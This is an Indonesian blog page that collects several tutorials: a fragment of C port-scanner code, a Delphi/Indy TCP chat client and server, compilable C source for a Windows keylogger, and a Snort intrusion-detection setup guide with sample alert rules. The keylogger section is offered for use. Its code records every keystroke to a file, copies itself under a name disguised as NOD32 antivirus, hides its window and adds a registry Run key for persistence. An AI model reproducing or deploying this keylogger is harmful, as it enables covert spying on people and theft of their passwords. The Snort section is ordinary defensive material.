for (i=str_ptr; i <= stp_ptr; i++)
{
if (CONNECTION(i)==0)
{
rp=getservbyport(htons(i),"tcp");
printf("Port %d Is Open !!!


Jangan digunain untuk hal-hal yang merugikan orang lain..!!

Networking Dengan Delphi

Tools dan Perlengkapan


- Delphi + Indy 9 (google it !)

- Komputer dalam jaringan (pake VMware juga bisa)

- Seperti biasa, Dream Theater dengan lagunya Octavarium


Langkah Kerja


-Berhubung kita membuat dua program, sekarang kita buat program client dulu yach


- Jalanin Delphi, buat project baru

- Di form1, tambahkan item:

- 1 Indy TCPClient

- 1 Button

- 1 Edit box

- Di event Form1-onCreate, masukkin code berikut:


IdTCPClient1.Host := '192.168.1.2'; //Ganti sesuai kebutuhan

IdTCPClient1.Port := 123; //Ganti sesuai kebutuhan

idTCPClient1.Connect;

idTCPClient1.WriteLn('Connected !');


Penjelasan:

Code di atas gunanya untuk ngasih tau idTCPClient1 bahwa hostnya 192.168.1.2 dan port 123. Perintah connect gunanya ya untuk connect ke server. Sedangkan perintah WriteLn gunanya untuk ngirim string berisi 'Connected !' ke server


- Pada event Button1-onClick, masukkin code berikut:


idTCPClient.WriteLn(Edit1.Text);


Penjelasan:

Dengan perintah WriteLn, idTCPClient1 ngirim string ke server yang isinya sama dengan text pada Edit1


OK, untuk sementara cukup dengan client.


Sekarang saatnya berpindah ke komputer server.

- Jalanin Delphi, buat project baru

- di form1, tambahkan item:

- 1 Indy TCPServer

- Di event Form1-onCreate, ketikkan code berikut:


idTCPServer1.DefaultPort := 123;

idTCPServer1.Active := True;


Penjelasan:

Property DefaultPort gunanya untuk ngasih tau idTCPServer1 bahwa default port-nya 123. Perintah Active gunanya ya untuk ngaktifin idTCPServer1


- Di event idTCPServer1-onExecute, ketikkan code berikut:


ShowMessage(AThread.Connection.ReadLn);


Penjelasan:

Perintah ShowMessage gunanya untuk menampilkan pesan dalam bentuk messagebox, isinya string yang dikirimkan dari client


Yap, that's it ! Program kita udah jadi, sekarang saatnya untuk ngeliat hasilnya.

Jalankan program server di komputer A, trus program client di komputer B. Ingat, ganti host dari idTCPClient1 dengan IP address-nya komputer A. Kalo udah, tinggal ketikkin pesan di edit box dalam program client, klik Button1. Dan kalo Anda melakukan dengan benar, seharusnya apa yang diketikkin di komputer client bakal muncul di komputer server. OK, untuk saat ini sekian dulu. Silakan kembangkan artikel ini untuk membuat program jaringan yang berguna. Happy coding !


Local KeyLogger

Ini ada sedikit source untuk yang suka main2 dengan yang namanya keylogger. Ini script tinggal di compile aja yah, silahkan dikembangin jika ada yang ingin mengembanginnya..

Code :
===========start================
#include
#include
#define KEY "c:\windows\Nod32Bak.exe"
#define LOG "c:\log.txt"

int keylogging(void)
{
short lul;
while(1)
{
Sleep(5);
for(lul=8;lul<=222;lul++)
{
if(GetAsyncKeyState(lul)==-32767)
{
FILE *fp;
fp = fopen(LOG,"a+");
if(fp == NULL)
{
return 1;
}
if(fp != NULL)
{
if((lul >= 39) && (lul <= 64))
{
fputc(lul,fp);
fclose(fp);
break;
}
else if((lul > 64) && (lul <>
{
lul+=32;
fputc(lul,fp);
fclose(fp);
break;
}
else
{
switch(lul)
{
case VK_SPACE:
fputc(' ',fp);
fclose(fp);
break;
case VK_SHIFT:
fputs("[SHIFT]",fp);
printf("[SHIFT]");
fclose(fp);
break;
case VK_RETURN:
fputs(" [ENTER]",fp);
fclose(fp);
break;
case VK_BACK:
fputs("[BACKSPACE]",fp);
fclose(fp);
break;
case VK_TAB:
fputs("[TAB]",fp);
fclose(fp);
break;
case VK_CONTROL:
fputs("[CTRL]",fp);
fclose(fp);
break;
case VK_DELETE:
fputs("[DEL]",fp);
fclose(fp);
break;
case VK_OEM_1:
fputs("[;:]",fp);
fclose(fp);
break;
case VK_OEM_2:
fputs("[/?]",fp);
fclose(fp);
break;
case VK_OEM_3:
fputs("[`~]",fp);
fclose(fp);
break;
case VK_OEM_4:
fputs("[ [{ ]",fp);
fclose(fp);
break;
case VK_OEM_5:
fputs("[\|]",fp);
fclose(fp);
break;
case VK_OEM_6:
fputs("[ ]} ]",fp);
fclose(fp);
break;
case VK_OEM_7:
fputs("['"]",fp);
fclose(fp);
break;
case VK_NUMPAD0:
fputc('0',fp);
fclose(fp);
break;
case VK_NUMPAD1:
fputc('1',fp);
fclose(fp);
break;
case VK_NUMPAD2:
fputc('2',fp);
fclose(fp);
break;
case VK_NUMPAD3:
fputc('3',fp);
fclose(fp);
break;
case VK_NUMPAD4:
fputc('4',fp);
fclose(fp);
break;
case VK_NUMPAD5:
fputc('5',fp);
fclose(fp);
break;
case VK_NUMPAD6:
fputc('6',fp);
fclose(fp);
break;
case VK_NUMPAD7:
fputc('7',fp);
fclose(fp);
break;
case VK_NUMPAD8:
fputc('8',fp);
fclose(fp);
break;
case VK_NUMPAD9:
fputc('9',fp);
fclose(fp);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",fp);
fclose(fp);
break;
default:
fclose(fp);
break;
}
}
}
}
}
}
}
int main(int argc, char **argv)
{
CopyFile(argv[0], KEY, 0);

HWND own = FindWindow(0,argv[0]);
ShowWindow(own, SW_HIDE);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\Mcft\Windows\CurrentVersion\Run",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"Nod32 Anti-Virus",0,REG_SZ,(const unsigned char*)KEY,sizeof(KEY));
RegCloseKey(hKey);

CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging,0,0,0);
system("pause");
}
=============END==============

semoga bermanfaat

Monitoring Serangan Hacker Ke Jaringan Dengan Snort

Snort merupakan salah satu software favorit yang digunakan untuk memproteksi network dari serangan hacker. Proteksi tambahan ini cukup memadai untuk menghindari serangan hacker pada umumnya.


'SNORT' merupakan salah satu software untuk mendeteksi intrusi pada system, mampu menganalisa 'real-time traffic' dan logging ip, mampu menganalisa port dan mendeteksi segala macam 'serangan' dari luar seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting. secara default nya snort mempunyai 3 hal yang terpenting yaitu :

(1) paket sniffer, seperti tcpdump, iptraf dll
(2) paket logger, yang berguna untuk paket traffic dll
(3) NIDS, deteksi intrusi pada network.


1.1 Pengenalan

Snort bukanlah software yang sulit, tapi perlu banyak latihan karena banyaknya 'command-command' yang harus digunakan, tujuan dari pembuatan artikel ini untuk membuat user lebih mudah untuk mengenali 'snort'.

1.2 Instalasi

download paket yang terbaru dari snort.org, saya disini menggunakan snort 2.0.0

# wget -c http://www.snort.org/dl/snort-2.0.0.tar.gz


jangan lupa juga mendownload rules terbaru.

# wget -c http://www.snort.org/dl/rules/snortrules-stable.tar.gz


extract dan install paket snort

# tar -zxvf snort-2.0.0.tar.gz ; cd snort-x.x.x ; ./configure ; make ; make install


untuk lebih lengkap nya silahkan baca ./configure --help secara default snort akan terinstall di /usr/local/bin/snort


1.3 Paket Sniffer

fyuh, mari coba pelajaran dasar dulu ;) jika anda ingin menampilkan TCP/IP header ke layar ( mis. sniffer mode ), coba perintah ini:

# snort -v

command di atas akan menjalan snort dan hanya akan menampilkan IP dan TCP/UDP/ICMP header, tapi jika anda mau melihat transit data coba dengan command ini

# snort -vd


instruksi tersebut akan menampilkan transit data, tapi jika anda mau lebih spesifik coba dengan


# snort -vde



1.3 Paket logger

ok, command-command di atas mungkin hanya sebagai pengenalan, pada instruksi diatas ada kasus dimana kita tidak mungkin melihat ke layar setiap menit nya ;) oleh karena itu dibutuhkan log, sebelum nya buat direktori 'log' di direktori kerja anda sekarang

# mkdir -p log

# snort -dve -l ./log



Jika instruksi diatas dijalankan, tetapi anda belum membuad direktory log, maka snort akan segera berhenti dengan keterangan 'ERROR: log directory './log' does not exist', jika berhasil, snort akan menyimpan setiap paket ke dalam direktori-direktory IP address, jika sistem anda memiliki beberapa network tetapi anda hanya ingin memonitor network tertentu saja.


# snort -dev -l ./log -h 192.168.1.0/24


Rules ini akan menyimpan setiap data link dan TCP/IP header ke dalam direktory 'log' dan menyimpan setiap paket dari 192.168.1.0 kelas C network.


1.4 Mendeteksi 'Pengacau' Jaringan

Sebelum ini di bahas, sebaik nya anda membaca manual dari snort.org, http://www.snort.org/docs/writing_rules/chap2.html , disini diminta untuk membuat rules sendiri atau anda bisa memakai rules yang di sedikan oleh snort.org sendiri.


# tar -zxvf snortrules-stable.tar.gz


tapi, saya coba membuat rules sendiri, karena saya kurang suka dengan paket dari orang lain, setelah di gunain tapi tidak tahu gunanya buat apa ;) contoh rules sederhana

# cd rules; touch avudz.conf

# vi avudz.conf

alert tcp any any -> ipsaya/29 21 (content: "root"; \

msg: "FTP root login";)

alert tcp any any -> ipprivate/24 22 (msg:"sshd access";)

alert tcp any any -> ipsaya/29 21 (content: "anonymous"; \

msg: "Ada yg Coba FTP server!";)

alert tcp any any -> ipsaya/29 22 (msg:"ada yang login";)

# http://www.linuxsecurity.com/feature_stories/feature_story-144.html


Content digunakan untuk mendefinisikan inputan dari $user, sedangkan msg untuk membuat pernyataan tentang $user yang menggunakan 'content' tersebut.

sebelum rules baru ini di jalankan, pastikan anda membuat direktory logging di /var/log/snort

# mkdir -p /var/log/snort


tetapi jika anda merasa partisi /var anda sudah minim, silahkan buat symbolic link untuk logging, misal

# ln -s /home/avudz/snort/log /var/log/snort


ok, selesai sudah ;) sekarang coba kita jalankan software nya.


# snort -d -c rules/avudz.conf

Running in IDS mode

Log directory = /var/log/snort

Initializing Network Interface eth0



setelah itu silahkan anda coba ftp / ssh ke server anda dari network yang berbeda ( diconfig saya menggunakan ip public), dan pantau traffic nya.


# tail -f /var/log/snort/alert



contoh :


[**] [1:0:0] ada yang login [**]

[Priority: 0]

06/12-05:47:23.911639 202.xxx.xxx.xx:3962 -> 202.xxx.xxx.xxx:22

TCP TTL:64 TOS:0x10 ID:57036 IpLen:20 DgmLen:52 DF

***A**** Seq: 0xAC015F2A Ack: 0xAD5438B5 Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 16723031 55655688

[**] [1:0:0] Ada yg Coba FTP server! [**]

[Priority: 0]

06/12-05:48:24.419800 202.xxx.xxx.xx:3971 -> 202.xxx.xxx.xxx:21

TCP TTL:64 TOS:0x10 ID:57642 IpLen:20 DgmLen:68 DF

***AP*** Seq: 0xAE133FB1 Ack: 0xAFCB3637 Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 16729081 55661127



Ah.. selesai sudah, tinggal tambahin beberapa rules yang dibutuhkan untuk memantau aktivitas 'machine' anda ;) misalnya iseng mo monitor irc server, tinggal tambahin di avudz.conf

# vi rules/avudz.conf

alert tcp ipsaya any -> any 6666:7000 (msg:"CHAT IRC "; flow:to_server,established; content: "NICK "; offset:0; classtype:misc-activity; sid:542; rev:8;)

alert tcp ipsaya any -> any 6666:7000 (msg:"permintaan DCC Chat "; flow:to_server,established; content:"PRIVMSG "; nocase; offset:0; content:" \:.DCC SEND"; nocase; classtype:misc-activity; sid:1639; rev:3;)

# === done === #


Semua config dan rules nya bisa anda pelajari dari file snortrules-stable.tar.gz yang sudah di extract, seperti msyql rules, backdoor rules, ICMP rules, bad traffic rules dll. yang penting adalah mencoba, jangan pernah menyerah! MERDEKA!! =)

Referensi :

1. http://www.snort.org/

2. http://www.snort.org/docs/writing_rules/chap2.html

3. http://marc.theaimsgroup.com/?l=snort-users

 

Indahnya Berbagi Copyright © 2012 Fast Loading -- Powered by Blogger